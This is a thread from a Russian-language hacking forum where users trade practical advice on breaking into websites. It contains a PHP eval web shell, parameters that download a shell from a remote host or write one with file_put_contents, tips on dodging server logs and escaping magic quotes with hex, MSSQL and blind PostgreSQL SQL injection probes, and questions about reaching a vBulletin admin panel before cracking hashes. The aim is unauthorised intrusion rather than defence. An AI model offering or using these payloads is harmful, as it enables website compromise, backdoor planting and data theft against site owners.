Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Каким образом найти раскрытие путей?
     
  2. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    http://forum.antichat.ru/showthread.php?t=30632
     
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    поиск - классная штука.
    Code:
    http://www.google.ru/search?client=opera&rls=en&q=site:forum.antichat.ru+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest
    первая ссылка
    Code:
    http://forum.antichat.ru/threadnav30632.html
    и ещё куча тем и тому подобного.
     
  4. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Зашел на один портал, решил проверить логин на xss, при вставке <script>alert('12');</script> в любое поле(пароль;логин) ифрейм(вводятся данные в ифрейме) выдает -
    Server Error in '/' Application.

    Code:
    <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
    
                <br><br>
    
    
    
                <b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a &lt;customErrors&gt; tag within a &quot;web.config&quot; configuration file located in the root directory of the current web application. This &lt;customErrors&gt; tag should then have its &quot;mode&quot; attribute set to &quot;Off&quot;.<br><br>
    
    можно как-то использовать в своих целях?
     
  5. Apokalepsys

    Apokalepsys Banned

    Joined:
    23 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Помигите пожалуйста.
    Допустим сайт вида http://sait.com/tut-tekst/i-tut.html

    возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных
     
  6. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Такая проблема: залил файл с таким содержанием <?php @eval($_GET[cmd]); ?>.
    phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    во-первых, http://php.net/manual/ru/function.file-put-contents.php
    во-вторых, magic quotes учитывай
    а шелл так льется, например:
    1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
     
    #17507 попугай, 29 Jul 2011
    Last edited: 29 Jul 2011
  8. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    1.Прочитал.
    2.magic_quotes_gpc On On
    3. Не работает.
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    ну мог бы по аналогии fileputcontens заюзать

    1=<?php shell>&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]);

    также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.
     
    1 person likes this.
  10. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    file_put_contents - пробовал, безрезультатно.
    Так я лью через скулю, файл с таким кодом я хотел залить

    <?php if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e'])); ?>

    Но увы )); почему-то не приняло. Может в бейс закодить?
     
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    читай про .htaccess. Не знаешь элементарного - нех лезть
     
  12. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Слабо знаком с SQL-иньекциями в MSSQL.
    http://www.site.com/internal.asp?ProdID=124335'
    http://www.site.com/internal.asp?ProdID=124335--
    Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно?

    http://www.site.com/internal.asp?ProdID=124335+AND+1=1--
    http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version--
    Что я делаю не так?
     
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,177
    Likes Received:
    617
    Reputations:
    690
    2Nek1t прочитай тут про "Все о MSSQL инъекциях."
     
    _________________________
  14. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Читал, и не только там.
    В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?
     
    #17514 Nek1t, 30 Jul 2011
    Last edited: 30 Jul 2011
  15. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    все нюансы можно понять только увидев линк, т.к. каждый пример индивидуален и не имеет шаблонных решений (в большинстве своём)
     
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай.
    Кавычки убери или закодь, но не в бейс, а в хекс.
     
  17. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    PHP/5.2.5
    Каким образом в хекс кодировать?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    клац

    или просто в консоли MySQL, select hex ('string'); (не забудь в начале добавить 0x)
     
    _________________________
  19. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку
     
    #17519 Cherep, 31 Jul 2011
    Last edited: 31 Jul 2011
  20. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    401
    Likes Received:
    118
    Reputations:
    23
    PostgreSQL 9.0.3 on i386-portbld-freebsd8.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD], 32-bit
    Близорукая инъекция.
    Если через нее подбирать ascii к версии, пользователю или имени БД то все норм выводится.
    Когда же начинаю вычислять имена таблиц, то они мягко говоря странные и для вариантов через INFORMATION_SCHEMA и PG_TABLES они разные:
    INFORMATION_SCHEMA:
    Code:
    uuywywwuwuwwuwuywwuuu h  u  
    hyuuuuu uyuy uy  u 
    _hh_hhy_  yu_ h__ ___ssesosngio 
    jc_j_ hx__  x_ vx_xxceetrinaam 
    csccc_ ccc__cc_scxccstnrogz    
    kesvkc_kvvjcvvcescssefroi     
    vnessscssscvssvneveenool     
    stneeekeeevseestnsnntip     
    eqtnnnvnnnsennerterrpma     
    trqtttstttenttnbqnoogp     
    rorrrrerrrntrrtortllag     
    flffffnzbftrbfrlbqii     
    bibbbbtbobrbobfiorad     
    idlooorolobolobdlb p    
    dpilllzlilllilomio a    
    pgdiiioidiiidilpdl     
    aapdddldmpddpmigmd     
      mpppippmppggdapm   
      gmmmdmggmgaam gp  
      agggpgaaga  p 
       aaama  
    
    ASCII идентичные UTF-8 коды для вышеуказанных имен таблиц:
    Code:
    117 117 121 119 121 119 119 117 119 117 119 119 117 119 117 121 119 119 117 117 117  104   117   
    104 121 117 117 117 117 117  117 121 117 121  117 121   117  
    95 104 104 95 104 104 121 95   121 117 95  104 95 95  95 95 95 115 115 101 115 111 115 110 103 105 111  
    106 99 95 106 95  104 120 95 95   120 95  118 120 95 120 120 99 101 101 116 114 105 110 97 97 109  
    99 115 99 99 99 95  99 99 99 95 95 99 99 95 115 99 120 99 99 115 116 110 114 111 103 122     
    107 101 115 118 107 99 95 107 118 118 106 99 118 118 99 101 115 99 115 115 101 102 114 111 105      
    118 110 101 115 115 115 99 115 115 115 99 118 115 115 118 110 101 118 101 101 110 111 111 108      
    115 116 110 101 101 101 107 101 101 101 118 115 101 101 115 116 110 115 110 110 116 105 112      
    101 113 116 110 110 110 118 110 110 110 115 101 110 110 101 114 116 101 114 114 112 109 97      
    116 114 113 116 116 116 115 116 116 116 101 110 116 116 110 98 113 110 111 111 103 112      
    114 111 114 114 114 114 101 114 114 114 110 116 114 114 116 111 114 116 108 108 97 103      
    102 108 102 102 102 102 110 122 98 102 116 114 98 102 114 108 98 113 105 105      
    98 105 98 98 98 98 116 98 111 98 114 98 111 98 102 105 111 114 97 100      
    105 100 108 111 111 111 114 111 108 111 98 111 108 111 98 100 108 98  112     
    100 112 105 108 108 108 122 108 105 108 108 108 105 108 111 109 105 111  97     
    112 103 100 105 105 105 111 105 100 105 105 105 100 105 108 112 100 108      
    97 97 112 100 100 100 108 100 109 112 100 100 112 109 105 103 109 100      
      109 112 112 112 105 112 112 109 112 112 103 103 100 97 112 109    
      103 109 109 109 100 109 103 103 109 103 97 97 109  103 112   
      97 103 103 103 112 103 97 97 103 97   112  
       97 97 97 109 97
    
    PG_TABLES:
    Code:
    huuuywhuuuyw  yyw   
    jy__uu   y  
    cecjhhc_c _cxe___ecineo    
    sqscs vxv_jscnveensdpta    
    trnse_scsscestsnntapaf     
    borencekeesnertirr     
    dgbntsnsnnetnormoo     
    paltretetttrtlfplg     
    a drfnrnrrrbrio d   
      mfbtztbfloomg   
      poorlrobiiiaa   
      gllfibloddg   
       iibdoilppa  
       ddomldimg  
       ppipimpga  
       gmdgdpma  
       agpamgg  
        am 
    
    Code:
    104 117 117 117 121 119 104 117 117 117 121 119   121 121 119    
    106 121 95 95 117 117    121   
    99 101 99 106 104 104 99 95 99  95 99 120 101 95 95 95 101 99 105 110 101 111     
    115 113 115 99 115  118 120 118 95 106 115 99 110 118 101 101 110 115 100 112 116 97     
    116 114 110 115 101 95 115 99 115 115 99 101 115 116 115 110 110 116 97 112 97 102      
    98 111 114 101 110 99 101 107 101 101 115 110 101 114 116 105 114 114      
    100 103 98 110 116 115 110 115 110 110 101 116 110 111 114 109 111 111      
    112 97 108 116 114 101 116 101 116 116 116 114 116 108 102 112 108 103      
    97  100 114 102 110 114 110 114 114 114 98 114 105 111  100    
      109 102 98 116 122 116 98 102 108 111 111 109 103    
      112 111 111 114 108 114 111 98 105 105 105 97 97    
      103 108 108 102 105 98 108 111 100 100 103    
       105 105 98 100 111 105 108 112 112 97   
       100 100 111 109 108 100 105 109 103   
       112 112 105 112 105 109 112 103 97   
       103 109 100 103 100 112 109 97   
       97 103 112 97 109 103 103   
        97 109  
    
    Пробывал делать to_ascii(TABLE_NAME), но в таком случае:
    Code:
    pg_query(): Query failed: ERROR: encoding conversion from UTF8 to ASCII not supported
    
     
Thread Status:
Not open for further replies.